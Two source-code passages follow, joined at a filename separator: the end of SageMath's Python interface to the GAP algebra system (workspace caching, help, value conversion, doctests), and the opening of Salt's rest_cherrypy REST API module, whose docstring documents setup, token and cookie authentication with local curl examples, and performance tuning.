True
sage: g.quit()
"""
if self.__use_workspace_cache:
from sage.libs.gap.saved_workspace import timestamp
try:
# Check to see if we need to auto-regenerate the gap
# workspace, i.e., if the gap script is more recent
# than the saved workspace, which signals that gap has
# been upgraded.
if os.path.getmtime(WORKSPACE) < timestamp():
raise OSError("GAP workspace too old")
# Set the modification time of the workspace to the
# current time. This ensures the workspace doesn't
# get deleted too soon by gap_reset_workspace().
os.utime(WORKSPACE, None)
except OSError:
gap_reset_workspace(verbose=False)
global first_try
n = self._session_number
try:
Expect._start(self, "Failed to start GAP.")
except Exception:
if self.__use_workspace_cache and first_try:
first_try = False
self.quit()
gap_reset_workspace(verbose=False)
Expect._start(self, "Failed to start GAP.")
self._session_number = n
self.__make_workspace = False
else:
raise
if self.__use_workspace_cache and self.__make_workspace:
self.save_workspace()
# Now, as self._expect exists, we can compile some useful pattern:
self._compiled_full_pattern = self._expect.compile_pattern_list([
r'@p\d+\.','@@','@[A-Z]',r'@[123456!"#$%&][^+]*\+',
'@e','@c','@f','@h','@i','@m','@n','@r',r'@s\d',r'@w.*\+','@x','@z'])
# read everything up to the first "ready" prompt
self._expect.expect("@i")
# set random seed
self.set_seed(self._seed)
def _function_class(self):
"""
Returns the GapFunction class.
EXAMPLES::
sage: gap._function_class()
<class 'sage.interfaces.gap.GapFunction'>
::
sage: type(gap.Order)
<class 'sage.interfaces.gap.GapFunction'>
"""
return GapFunction
def cputime(self, t=None):
r"""
Returns the amount of CPU time that the GAP session has used. If
``t`` is not None, then it returns the difference
between the current CPU time and ``t``.
EXAMPLES::
sage: t = gap.cputime()
sage: t #random
0.13600000000000001
sage: gap.Order(gap.SymmetricGroup(5))
120
sage: gap.cputime(t) #random
0.059999999999999998
"""
if t is not None:
return self.cputime() - t
else:
self.eval('_r_ := Runtimes();')
r = sum(eval(self.eval('[_r_.user_time, _r_.system_time, _r_.user_time_children, _r_.system_time_children]')))
return r/1000.0
def save_workspace(self):
r"""
Save the GAP workspace.
TESTS:
We make sure that :trac:`9938` (GAP does not start if the path
to the GAP workspace file contains more than 82 characters) is
fixed::
sage: ORIGINAL_WORKSPACE = sage.interfaces.gap.WORKSPACE
sage: sage.interfaces.gap.WORKSPACE = os.path.join(SAGE_TMP, "gap" + "0"*(80-len(SAGE_TMP)))
sage: gap = Gap()
sage: gap('3+2') # long time (4s on sage.math, 2013)
5
sage: sage.interfaces.gap.WORKSPACE = ORIGINAL_WORKSPACE
"""
prepare_workspace_dir()
# According to the GAP Reference Manual,
# [https://www.gap-system.org/Manuals/doc/htm/ref/CHAP003.htm#SSEC011.1]
# SaveWorkspace can only be used at the main gap> prompt. It cannot
# be included in the body of a loop or function, or called from a
# break loop.
from sage.misc.temporary_file import atomic_write
with atomic_write(WORKSPACE) as f:
f.close()
self.eval('SaveWorkspace("%s");'%(f.name), allow_use_file=False)
# Todo -- this -- but there is a tricky "when does it end" issue!
# Maybe do via a file somehow?
def help(self, s, pager=True):
"""
Print help on a given topic.
EXAMPLES:
Note: In order to ensure consistent unicode handling from GAP we
start a GAP instance with a forced UTF-8 locale::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap.help('SymmetricGroup', pager=False))
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
<BLANKLINE>
"""
if self.is_remote():
tmp_to_use = self._remote_tmpfile()
else:
tmp_to_use = self._local_tmpfile()
self.eval('SetGAPDocTextTheme("none")')
gap_encoding = str(self('GAPInfo.TermEncoding;'))
self.eval(r'\$SAGE.tempfile := "%s";' % tmp_to_use)
line = Expect.eval(self, "? %s" % s)
Expect.eval(self, "? 1")
match = re.search(r"Page from (\d+)", line)
if match is None:
print(line)
else:
(sline,) = match.groups()
sline = int(sline) - 1
if self.is_remote():
self._get_tmpfile()
with io.open(self._local_tmpfile(), "r",
encoding=gap_encoding) as fobj:
help = fobj.read()
if pager:
from IPython.core.page import page
page(help, start=sline)
else:
# Find the n-th line and return from there
idx = -1
while sline:
try:
idx = help.find('\n', idx + 1)
sline -= 1
except ValueError:
# We ran out of lines early somehow; this shouldn't
# happen though
break
return help[idx:]
def set(self, var, value):
"""
Set the variable var to the given value.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
"""
cmd = ('%s:=%s;;' % (var, value)).replace('\n','')
self._eval_line(cmd, allow_use_file=True)
def get(self, var, use_file=False):
"""
Get the string representation of the variable var.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
"""
if use_file:
tmp = self._local_tmpfile()
if os.path.exists(tmp):
os.unlink(tmp)
self.eval('PrintTo("%s", %s);'%(tmp,var), strip=False)
with open(tmp) as f:
r = f.read()
r = r.strip().replace("\\\n","")
os.unlink(tmp)
return r
else:
return self.eval('Print(%s);'%var, newlines=False)
def _pre_interact(self):
"""
EXAMPLES::
sage: gap._pre_interact()
sage: gap._post_interact()
"""
self._eval_line(r'\$SAGE.StartInteract();')
def _post_interact(self):
"""
EXAMPLES::
sage: gap._pre_interact()
sage: gap._post_interact()
"""
self._eval_line(r'\$SAGE.StopInteract();')
def _eval_line_using_file(self, line):
i = line.find(':=')
if i != -1:
j = line.find('"')
if j >= 0 and j < i:
i = -1
if i == -1:
line0 = 'Print( %s );'%line.rstrip().rstrip(';')
try: # this is necessary, since Print requires something as input, and some functions (e.g., Read) return nothing.
return Expect._eval_line_using_file(self, line0)
except RuntimeError:
return ''
return Expect._eval_line_using_file(self, line)
def console(self):
"""
Spawn a new GAP command-line session.
EXAMPLES::
sage: gap.console() # not tested
********* GAP, Version 4.5.7 of 14-Dec-2012 (free software, GPL)
* GAP * https://www.gap-system.org
********* Architecture: x86_64-unknown-linux-gnu-gcc-default64
Libs used: gmp, readline
Loading the library and packages ...
Packages: GAPDoc 1.5.1
Try '?help' for help. See also '?copyright' and '?authors'
gap>
"""
gap_console()
def _object_class(self):
"""
Returns the GapElement class.
EXAMPLES::
sage: gap._object_class()
<class 'sage.interfaces.gap.GapElement'>
sage: type(gap(2))
<class 'sage.interfaces.gap.GapElement'>
"""
return GapElement
def _function_element_class(self):
"""
Returns the GapFunctionElement class.
EXAMPLES::
sage: gap._function_element_class()
<class 'sage.interfaces.gap.GapFunctionElement'>
sage: type(gap.SymmetricGroup(4).Order)
<class 'sage.interfaces.gap.GapFunctionElement'>
"""
return GapFunctionElement
@cached_method
def _tab_completion(self):
"""
Return additional tab completion entries
OUTPUT:
List of strings
EXAMPLES::
sage: '{}' in gap._tab_completion()
False
sage: c = gap._tab_completion()
sage: len(c) > 100
True
sage: 'Order' in c
True
"""
names = eval(self.eval('NamesSystemGVars()')) + \
eval(self.eval('NamesUserGVars()'))
return [n for n in names if n[0] in string.ascii_letters]
############
def gap_reset_workspace(max_workspace_size=None, verbose=False):
r"""
Call this to completely reset the GAP workspace, which is used by
default when Sage first starts GAP.
The first time you start GAP from Sage, it saves the startup state
of GAP in a file ``$HOME/.sage/gap/workspace-gap-HASH``, where ``HASH``
is a hash of the directory where Sage is installed.
This is useful, since then subsequent startup of GAP is at least 10
times as fast. Unfortunately, if you install any new code for GAP,
it won't be noticed unless you explicitly load it, e.g., with
gap.load_package("my_package")
The packages sonata, guava, factint, gapdoc, grape, design, toric,
and laguna are loaded in all cases before the workspace is saved,
if they are available.
TESTS:
Check that the race condition from :trac:`14242` has been fixed.
We temporarily need to change the worksheet filename. ::
sage: ORIGINAL_WORKSPACE = sage.interfaces.gap.WORKSPACE
sage: sage.interfaces.gap.WORKSPACE = tmp_filename()
sage: from multiprocessing import Process
sage: import time
sage: gap = Gap() # long time (reset GAP session)
sage: P = [Process(target=gap, args=("14242",)) for i in range(4)]
sage: for p in P: # long time, indirect doctest
....: p.start()
....: time.sleep(float(0.2))
sage: for p in P: # long time
....: p.join()
sage: os.unlink(sage.interfaces.gap.WORKSPACE) # long time
sage: sage.interfaces.gap.WORKSPACE = ORIGINAL_WORKSPACE
"""
# Create new workspace with filename WORKSPACE
g = Gap(use_workspace_cache=False, max_workspace_size=None)
g.eval('SetUserPreference("HistoryMaxLines", 30)')
from sage.tests.gap_packages import all_installed_packages
for pkg in all_installed_packages(gap=g):
try:
g.load_package(pkg, verbose=verbose)
except RuntimeError as msg:
if verbose:
print('*** %s' % msg)
# end for
g.save_workspace()
g.quit()
@instancedoc
class GapElement(GapElement_generic):
def __getitem__(self, n):
"""
EXAMPLES::
sage: a = gap([1,2,3])
sage: a[1]
1
"""
self._check_valid()
if not isinstance(n, tuple):
return self.parent().new('%s[%s]' % (self._name, n))
return self.parent().new('%s%s' % (self._name,
''.join('[%s]' % x for x in n)))
def str(self, use_file=False):
"""
EXAMPLES::
sage: print(gap(2))
2
"""
if use_file:
P = self._check_valid()
return P.get(self.name(), use_file=True)
else:
return repr(self)
def _latex_(self):
r"""
EXAMPLES::
sage: s = gap("[[1,2], [3/4, 5/6]]")
sage: latex(s)
\left(\begin{array}{rr} 1&2\\ 3/4&\frac{5}{6}\\ \end{array}\right)
"""
P = self._check_valid()
try:
s = P.eval('LaTeXObj(%s)'%self.name())
s = s.replace('\\\\','\\').replace('"','')
s = s.replace('%\\n',' ')
return s
except RuntimeError:
return str(self)
@cached_method
def _tab_completion(self):
"""
Return additional tab completion entries
OUTPUT:
List of strings
EXAMPLES::
sage: s5 = gap.SymmetricGroup(5)
sage: 'Centralizer' in s5._tab_completion()
True
"""
P = self.parent()
v = P.eval(r'\$SAGE.OperationsAdmittingFirstArgument(%s)'%self.name())
v = v.replace('Tester(','').replace('Setter(','').replace(')','').replace('\n', '')
v = v.split(',')
v = [ oper.split('"')[1] for oper in v ]
v = [ oper for oper in v if all(ch in string.ascii_letters for ch in oper) ]
return sorted(set(v))
@instancedoc
class GapFunctionElement(FunctionElement):
def _instancedoc_(self):
"""
EXAMPLES::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap(4).SymmetricGroup.__doc__)
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
"""
M = self._obj.parent()
help = M.help(self._name, pager=False)
return help
@instancedoc
class GapFunction(ExpectFunction):
def _instancedoc_(self):
"""
EXAMPLES::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap.SymmetricGroup.__doc__)
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
"""
M = self._parent
help = M.help(self._name, pager=False)
return help
def is_GapElement(x):
"""
Returns True if x is a GapElement.
EXAMPLES::
sage: from sage.interfaces.gap import is_GapElement
sage: is_GapElement(gap(2))
True
sage: is_GapElement(2)
False
"""
return isinstance(x, GapElement)
def gfq_gap_to_sage(x, F):
"""
INPUT:
- ``x`` -- GAP finite field element
- ``F`` -- Sage finite field
OUTPUT: element of ``F``
EXAMPLES::
sage: x = gap('Z(13)')
sage: F = GF(13, 'a')
sage: F(x)
2
sage: F(gap('0*Z(13)'))
0
sage: F = GF(13^2, 'a')
sage: x = gap('Z(13)')
sage: F(x)
2
sage: x = gap('Z(13^2)^3')
sage: F(x)
12*a + 11
sage: F.multiplicative_generator()^3
12*a + 11
TESTS:
Check that :trac:`18048` is fixed::
sage: K.<a> = GF(16)
sage: b = a^2 + a
sage: K(b._gap_())
a^2 + a
AUTHOR:
- David Joyner and William Stein
"""
s = str(x)
if s[:2] == '0*':
return F(0)
i1 = s.index("(")
i2 = s.index(")")
q = eval(s[i1+1:i2].replace('^','**'))
if not F.cardinality().is_power_of(q):
raise ValueError('%r has no subfield of size %r' % (F, q))
if s.find(')^') == -1:
e = 1
else:
e = int(s[i2+2:])
if F.degree() == 1:
g = F(gap.eval('Int(Z(%s))' % q))
elif F.is_conway():
f = (F.cardinality() - 1) // (q - 1)
g = F.multiplicative_generator() ** f
else:
raise ValueError('%r is not prime or defined by a Conway polynomial' % F)
return g**e
def intmod_gap_to_sage(x):
r"""
INPUT:
- x -- Gap integer mod ring element
EXAMPLES::
sage: a = gap(Mod(3, 18)); a
ZmodnZObj( 3, 18 )
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Ring of integers modulo 18
sage: a = gap(Mod(3, 17)); a
Z(17)
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Finite Field of size 17
sage: a = gap(Mod(0, 17)); a
0*Z(17)
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
0
sage: b.parent()
Finite Field of size 17
sage: a = gap(Mod(3, 65537)); a
ZmodpZObj( 3, 65537 )
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Ring of integers modulo 65537
"""
from sage.rings.finite_rings.all import FiniteField
from sage.rings.finite_rings.integer_mod import Mod
from sage.rings.integer import Integer
s = str(x)
m = re.search(r'Z\(([0-9]*)\)', s)
if m:
return gfq_gap_to_sage(x, FiniteField(Integer(m.group(1))))
m = re.match(r'Zmod[np]ZObj\( ([0-9]*), ([0-9]*) \)', s)
if m:
return Mod(Integer(m.group(1)), Integer(m.group(2)))
raise ValueError("Unable to convert Gap element '%s'" % s)
#############
gap = Gap()
def reduce_load_GAP():
"""
Returns the GAP interface object defined in sage.interfaces.gap.
EXAMPLES::
sage: from sage.interfaces.gap import reduce_load_GAP
sage: reduce_load_GAP()
Gap
"""
return gap
def gap_console():
"""
Spawn a new GAP command-line session.
Note that in gap-4.5.7 you cannot use a workspace cache that had
no commandline to restore a gap session with commandline.
EXAMPLES::
sage: gap_console() # not tested
********* GAP, Version 4.5.7 of 14-Dec-2012 (free software, GPL)
* GAP * https://www.gap-system.org
********* Architecture: x86_64-unknown-linux-gnu-gcc-default64
Libs used: gmp, readline
Loading the library and packages ...
Packages: GAPDoc 1.5.1
Try '?help' for help. See also '?copyright' and '?authors'
gap>
TESTS::
sage: import subprocess as sp
sage: from sage.interfaces.gap import gap_command
sage: cmd = 'echo "quit;" | ' + gap_command(use_workspace_cache=False)[0]
sage: gap_startup = sp.check_output(cmd, shell=True,
....: stderr=sp.STDOUT,
....: encoding='latin1')
sage: 'www.gap-system.org' in gap_startup
True
sage: 'Error' not in gap_startup
True
sage: 'sorry' not in gap_startup
True
"""
from sage.repl.rich_output.display_manager import get_display_manager
if not get_display_manager().is_in_terminal():
raise RuntimeError('Can use the console only in the terminal. Try %%gap magics instead.')
cmd, _ = gap_command(use_workspace_cache=False)
cmd += ' ' + os.path.join(SAGE_EXTCODE,'gap','console.g')
os.system(cmd)
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9, 2017.7.3, Oxygen
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: Oxygen
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentcation is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`client interfaces <netapi-clients>`
documentation, but in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<netapi-clients>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running async jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import os
import signal
import tarfile
from multiprocessing import Process, Pipe
logger = logging.getLogger(__name__)
# Import third-party libs
# pylint: disable=import-error, 3rd-party-module-not-gated
import cherrypy
try:
from cherrypy.lib import cpstats
except AttributeError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed. '
'Possible upstream bug: '
'https://github.com/cherrypy/cherrypy/issues/1444')
except ImportError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed.')
# pylint: enable=import-error, 3rd-party-module-not-gated
# Import Salt libs
import salt
import salt.auth
import salt.exceptions
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
from salt.ext import six
from salt.ext.six import BytesIO
# Import salt-api libs
import salt.netapi
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
